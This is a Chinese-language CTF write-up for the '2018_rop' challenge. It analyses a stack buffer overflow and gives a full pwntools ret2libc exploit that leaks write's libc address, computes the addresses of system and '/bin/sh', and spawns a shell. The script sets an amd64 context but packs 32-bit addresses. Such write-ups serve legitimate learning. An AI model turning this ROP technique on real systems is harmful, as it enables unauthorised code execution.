【CTF】 2018_rop

题目分析

1 反编译，寻找可以利用的漏洞

void main(void)
{
    
  be_nice_to_people();
  vulnerable_function();
  write(1,"Hello, World\n",0xd);
  return;
}

从main函数来看，函数vulnerable_function是个最明显的提示，大概率就是突破点，但是be_nice_to_people也可以捎带看一眼。

void be_nice_to_people(void)
{
    
  __gid_t __rgid;
  __rgid = getegid();
  setresgid(__rgid,__rgid,__rgid);
  return;
}

好吧，确实没看到可以利用的点，查了下资料，也没找到这个函数存在的必要性，待定吧。

void vulnerable_function(void)
{
    
  undefined local_8c [136];
  read(0,local_8c,0x100);
  return;
}

ok，这个就是典型的溢出，read的长度限制比数组长度大。

2 分析利用链

1 查找整个反编译工程，没有看到system或者execve等函数，也没看到/bin/sh字符串，也没找到其他可利用函数，那基本可以确定是ret2libc的套路
2 需要拿到libc中函数的地址，那可以利用的点，就是通过write函数来打印输出
3 然后，通过地址推算出system和/bin/sh的地址
4 需要再次执行，那就需要溢出后能再次跳转到vulnerable_function
5 通过vulnerable_function再次执行溢出跳转到system
ok, 1 2 3 5都是常规操作，4 需要研究下怎么跳转，还好，上篇学到的函数返回地址(call和函数直接调用的区别)可以派上用场，试验一下，果然可行。

利用脚本

1 from pwn import *
  2 from LibcSearcher import *
  3 elf = ELF('2018_rop')
  4 libc = ELF('libc-2.27.so') # 根据环境不同进行替换
  5
  6 context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
  7
  8 #asm()将接受到的字符串转变为汇编码的机器代码,而shellcraft可以生成asm下的shellcode
  9 #shellcode=asm(shellcraft.amd64.linux.sh())
 10 #print(len(shellcode))
 11 #print(shellcode)
 12
 13 sh = process('./2018_rop')
 14 pad = 'A' * 140
 15 write_got_addr = 0x0804a010
 16 vulner_addr = 0x080484d4 # 返回地址
 17 payload = pad.encode()
    # write函数plt地址 + write函数返回地址 + write参数1 + write函数got地址 + write参数3
    # 实现效果，打印write函数内存地址，同时返回到vulnerable_function再次执行
 18 payload += p32(0x080483a0)  + p32(vulner_addr)  + p32(0x01) + p32(write_got_addr) + p32(0x20)
 19
 20 sh.sendline(payload)
 21 content = sh.recv()[:4]
 22 mem_addr = int.from_bytes(content, 'little')
 23 print("%#x -> %s" % (write_got_addr, hex(mem_addr)))
 24
 25 # 优先尝试lib-database查找
 26 obj = LibcSearcher("write", mem_addr)
 27 obj.dump('system')
 28
 29 libc_write_offset = libc.sym['write']
 30 print(hex(libc_write_offset))
 31
 32 libc_system_offset = libc.sym['system']
 33 print(hex(libc_system_offset))
 34
 35 libc_database = mem_addr - libc_write_offset
 36
 37 mem_system_addr = libc_database + libc_system_offset
 38 print(hex(mem_system_addr))
 39
 40 mem_binsh = libc_database + next(libc.search(b'/bin/sh'))
 41 print(hex(mem_binsh))
 42
 43 # system函数内存地址 + system函数返回地址(这里不重要) + /bin/sh的内存地址
 44 payload1 = pad.encode() + p32(mem_system_addr) + p32(0x12345678) + p32(mem_binsh)
 45 sh.sendline(payload1)
 46
 47 with open('payload.txt', 'wb') as f:
 48    f.write(payload)
 49    f.write(payload1)
 50
 51
 52 sh.interactive()

总结

总感觉对于栈的理解不够深刻，需要系统性的学习一下，不过没找到好的资料，只能边刷题边学习了。